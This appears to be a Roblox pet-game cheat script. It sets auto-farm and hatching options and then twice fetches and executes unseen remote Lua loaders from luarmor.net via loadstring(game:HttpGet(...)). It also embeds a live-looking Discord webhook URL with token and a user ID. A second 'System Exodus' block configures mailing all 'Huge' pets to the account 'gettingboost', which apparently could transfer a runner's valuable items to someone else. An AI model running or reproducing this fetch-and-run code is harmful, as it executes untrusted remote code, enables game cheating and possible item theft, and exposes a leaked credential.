wait(5)
getgenv().KiTTYWARE_ElementalWorld = {
    Catch_Huges = true,
    Complete_Trainer_Quests = false,

    Auto_Cube_Merchant = false,

    Hatch_Last_Egg = true,
    Farm_Last_Zone = true,
    Pets_Per_Breakable = 2,

    discord_Webhook = "https://discord.com/api/webhooks/1273665273848795167/5ig7c7YSn7YINFekOfz0oaUGiyxFIsttzMzDGG_-IJNm6QctEAsrRfLDe1IDaRMtN1Bl",
    discord_UserID = "807267031929716776",
    mail_Enabled = false, -- WARN: 1% chance to donate to KW devs <3
    mail_Username = "",
    Fps_Boost = true,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/bf88f8790b3e6c196d51b59dc600c9ee.lua"))()

wait(5)
getgenv().Settings = {
    Mailing = {
        ["All Huges"] = {Class = "Pet", Amount = 1, AllTypes = true},
        --["Giant Coin Jar"] = {Class = "Misc", Amount = 20},
        --["Rainbow Swirl"] = {Class = "Misc", Amount = "Max"},
        --["Diamonds"] = {Class = "Currency", Amount = 10000}
        --["Rainbow Huge Cat"] = {Class = "Pet", Amount = "Max"}
    },
    Users = {
        "gettingboost",
      --  "Username2",
      --  "Username3",
    },
    ["Split Items Evenly"] = true, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,

    [[ Thank you for using System Exodus <3! ]]
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
